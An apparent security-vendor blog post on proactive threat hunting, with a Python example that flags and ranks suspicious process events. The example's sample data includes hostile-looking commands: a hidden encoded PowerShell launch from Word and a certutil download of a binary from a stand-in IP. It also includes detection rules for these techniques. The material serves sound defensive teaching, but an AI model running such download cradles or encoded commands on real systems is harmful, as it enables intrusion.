Cyber threats evolve quickly, and relying solely on reactive measures is no longer enough. Threat hunting is the proactive alternative: it uses threat intelligence, alerts, log data, and the hunter's own technical experience to form hypotheses that can be tested against the environment to find threats that existing controls missed, security gaps, and, occasionally, attack techniques nobody has seen before.
As cyber threats become more sophisticated, threat hunting empowers businesses to seek out and neutralize threats before they can cause significant harm.
Threat hunting is the process of proactively searching through networks and endpoints to identify signs of malicious activity that have evaded traditional security defenses. Unlike conventional security measures, which often rely on alerts triggered by known threats or vulnerabilities, threat hunting involves asking critical questions and testing hypotheses about potential threats based on observed behaviors or patterns.
Threat hunting has grown in popularity in recent years for a simple reason: attackers have the first-move advantage in most scenarios. They choose when and how to act, and their victims often aren't aware of the intrusion until it's too late. Threat hunting aims to close that gap. It is about being proactive, combining technical and behavioral analysis to find intruders before they can do greater damage.
Dwell time, the interval between initial compromise and detection, has always been the core problem. Threat actors can sneak into an environment unnoticed and maintain persistence for months or even years. Thanks to wider adoption of detection and response technology, that window has shrunk considerably: in 2023 the global median dwell time dropped to 10 days, down from 16 days in 2022. That's progress, but 10 days is still more than enough for adversaries to do real damage. Mandiant red teams report that they typically need only five to seven days to achieve their objectives. It's in this gap between adversary speed and detection technology that proactive threat hunting becomes critical.
Everyone has their own approach or way of thinking about things, and that goes for researchers too. I like to think there are four types of hunts: intelligence-driven, data-driven, knowledge-driven, and, of course, hybrid hunts.
Intelligence-driven hunts consist of collecting and analyzing intelligence from various sources in order to execute the hunt mission. Intelligence can consist of indicators of compromise (IOCs) such as file names, hashes, IP addresses, domains, and email addresses, as well as campaign reporting that describes how an actor operates. Using the collected intelligence, we can create hypotheses that we can test against our data sources. One caveat: atomic indicators such as hashes and IPs are cheap for an adversary to change, so an intelligence-driven hunt that finds nothing should pivot to the behavior the report describes rather than stop at the indicator list.
Data-driven hunts rely on internal data that could potentially indicate malicious behavior. The types of data we could use for data-driven hunts are low-priority alerts and detections, and aggregated analytics such as first-seen processes, rare parent/child process pairs, or unusual logon patterns. This data does not give us our "smoking gun," nor does it mean anything bad is happening at all, but it gives us a good starting point to create hypotheses about what we are seeing.
Knowledge-driven hunts rely on our knowledge of available data sets, client networks, and adversary tactics, techniques, and procedures (TTPs). Knowing adversary TTPs tells us what malicious behavior looks like and therefore where to look for it. Using frameworks like MITRE ATT&CK, we can create hypotheses based on threat actor TTPs that have been seen in the wild.
Hybrid hunts combine two or more types of hunts that could help us create hypotheses with a narrower scope. For example, if data shows certain events happening on endpoints and intel suggests that these events could be part of a campaign that adversaries are conducting, we can create a hypothesis that combines data-driven and intelligence-driven hunt methods.
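To make the four hunt types concrete, here is an added example (mine, not Huntress code) that tests one hypothesis of each type against a handful of constructed process-creation events and then merges the results the way a hybrid hunt would. The event data, the IOC list, the known-good baseline and the TTP rules are all assumptions made for illustration; in practice the IOCs would come from your intelligence feed, the baseline from your own telemetry, and the rules from ATT&CK-informed detection engineering.

```python
"""Hypothesis-driven hunt over constructed endpoint telemetry.

Added example, not Huntress code. The events, IOC list and baseline are
constructed for illustration (IPs use RFC 5737 documentation ranges); the
TTP rules cover a few well-known ATT&CK techniques, not a full detection set.
"""
import re
from collections import defaultdict

# Constructed process-creation events for the hunt window.
EVENTS = [
    {"id": 1, "host": "WS01", "parent": "explorer.exe", "image": "outlook.exe",
     "cmdline": "outlook.exe", "dest_ip": None},
    {"id": 2, "host": "WS01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "dest_ip": "203.0.113.7"},
    {"id": 3, "host": "WS02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "dest_ip": None},
    {"id": 4, "host": "WS02", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.23/u.bin u.bin",
     "dest_ip": "198.51.100.23"},
    {"id": 5, "host": "WS03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1", "dest_ip": None},
    {"id": 6, "host": "WS03", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami", "dest_ip": None},
    {"id": 7, "host": "WS04", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe", "dest_ip": "203.0.113.7"},
]

# Intelligence-driven input: IOCs from a constructed, fictional campaign report.
IOCS = {"ips": {"203.0.113.7"}, "cmd_fragments": {"-urlcache -split -f"}}

# Data-driven input: parent->child pairs observed during a known-good baseline period.
BASELINE_PAIRS = {
    ("explorer.exe", "outlook.exe"), ("services.exe", "svchost.exe"),
    ("explorer.exe", "powershell.exe"), ("explorer.exe", "cmd.exe"),
    ("explorer.exe", "chrome.exe"),
}

# Knowledge-driven input: adversary TTPs written as behavioural rules.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_PS = re.compile(r"(?i)(^|\s)-e(nc(odedcommand)?)?(\s|$)")  # -e, -enc, -EncodedCommand


def intelligence_hunt(events, iocs=IOCS):
    """Hypothesis: hosts touched by the reported campaign exhibit its IOCs."""
    hits = defaultdict(list)
    for ev in events:
        if ev["dest_ip"] in iocs["ips"]:
            hits[ev["id"]].append(f"intel: connection to IOC {ev['dest_ip']}")
        for frag in iocs["cmd_fragments"]:
            if frag in ev["cmdline"]:
                hits[ev["id"]].append(f"intel: command line matches IOC '{frag}'")
    return dict(hits)


def data_driven_hunt(events, baseline=BASELINE_PAIRS):
    """Hypothesis: a parent/child chain never seen in the baseline deserves a look.
    A first-seen chain is a lead, not proof; new software produces them too."""
    return {ev["id"]: [f"data: first-seen process chain {ev['parent']} -> {ev['image']}"]
            for ev in events if (ev["parent"], ev["image"]) not in baseline}


def knowledge_hunt(events):
    """Hypothesis: phishing follow-on activity looks like ATT&CK T1566 -> T1059.001,
    with T1027 (encoded PowerShell) and T1105 (LOLBin download cradle)."""
    hits = defaultdict(list)
    for ev in events:
        if ev["parent"] in OFFICE_APPS and ev["image"] in INTERPRETERS:
            hits[ev["id"]].append("ttp: Office app spawned a script interpreter (T1566 -> T1059)")
        if ev["image"] == "powershell.exe" and ENCODED_PS.search(ev["cmdline"]):
            hits[ev["id"]].append("ttp: encoded PowerShell command (T1059.001, T1027)")
        if ev["image"] == "certutil.exe" and "urlcache" in ev["cmdline"].lower():
            hits[ev["id"]].append("ttp: certutil used as a download cradle (T1105)")
    return dict(hits)


def hybrid_hunt(events):
    """Merge the three hunts. An event flagged by several independent hypotheses
    has a narrower scope and goes to the top of the analyst's queue."""
    merged = defaultdict(list)
    for result in (intelligence_hunt(events), data_driven_hunt(events), knowledge_hunt(events)):
        for ev_id, reasons in result.items():
            merged[ev_id].append(reasons)
    ranked = [{"id": ev_id, "hunt_types": len(groups), "reasons": sum(groups, [])}
              for ev_id, groups in merged.items()]
    ranked.sort(key=lambda r: (-r["hunt_types"], r["id"]))
    return ranked


if __name__ == "__main__":
    for row in hybrid_hunt(EVENTS):
        print(f"event {row['id']}: flagged by {row['hunt_types']} hunt type(s)")
        for reason in row["reasons"]:
            print("   ", reason)
```

Running it puts events 2 and 4 at the top, each flagged by all three hunt types, while the first-seen chain on event 6 and the lone IOC hit on event 7 surface as single-source leads: exactly the "starting point, not a smoking gun" situation a data-driven hunt produces. The point of the hybrid step is the ranking, not the individual rules; any one of them alone would bury the analyst in benign first-seen pairs or stale indicators.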
A hunt begins with a trigger: a hypothesis formed from intelligence, data, or knowledge as described above, a low-priority alert from a tool such as a SIEM, or abnormal network behavior.
Next comes the investigation. The hunter queries the relevant data sources to test the hypothesis, leveraging analytics and, where available, machine learning for pattern recognition and anomaly detection. A hypothesis that is disproven is still a useful result and should be documented, so the team does not repeat the same hunt.
Finally, the findings must be acted upon. This can involve containing affected hosts, removing malicious artifacts from the network, patching vulnerabilities, updating security policies, and turning confirmed malicious behavior into an automated detection so that the next occurrence is caught without a hunt.
Know Your Environment: Understanding what "normal" looks like in your network (which processes spawn which, who logs in where, what talks to the internet) makes the anomalies that signal threats stand out.
Utilize Threat Intelligence: Incorporate data from threat intelligence feeds to keep your hypotheses grounded in the current threat landscape.
Engage in Continuous Learning: Threat landscapes evolve, so regular training and knowledge updates for your threat hunters are essential.
The success of any threat hunting program heavily relies on the right tools:
Security Information and Event Management (SIEM): A SIEM centralizes logs and alerts from diverse sources so hunters can search and correlate them in one place. Huntress Managed SIEM puts enterprise-grade SIEM in reach for any threat hunting team.
Endpoint Detection and Response (EDR): Get an unfair advantage against threat actors with endpoint protection that records and analyzes activity on endpoints (process creation, network connections, file and registry changes) to detect malicious behavior; this telemetry is the primary data source for most hunts.
Threat Intelligence Platforms (TIPs): Aggregate threat data from diverse sources—valuable for both proactive and reactive measures.
At the end of the day, software alone can't match human judgment. Machine learning and automation have their place, but they still require humans to make the final decision to contain and respond accurately. Plus, modern threat actors are intelligent and know how to exploit those blind spots. They've got entire teams that spend their days identifying ways to abuse, exploit, or slip past IT security tools. How can you expect to beat that with automation alone?
We need hunters at the forefront. A threat hunter with a well-trained eye is more likely to pick up on TTPs and suspicious activity and can actually help software-based tools be more accurate. Overall, threat hunting enables security teams to identify unknown threats and catch them before they cause major damage and disruption. It’s this proactive protection against the unknown that makes threat hunting unique and incredibly important to cybersecurity today.
Want to dive deeper into what threat hunting looks like? Check out our video series, Behind the Hunt, to explore the world of threat hunting and security research from the defender's point of view.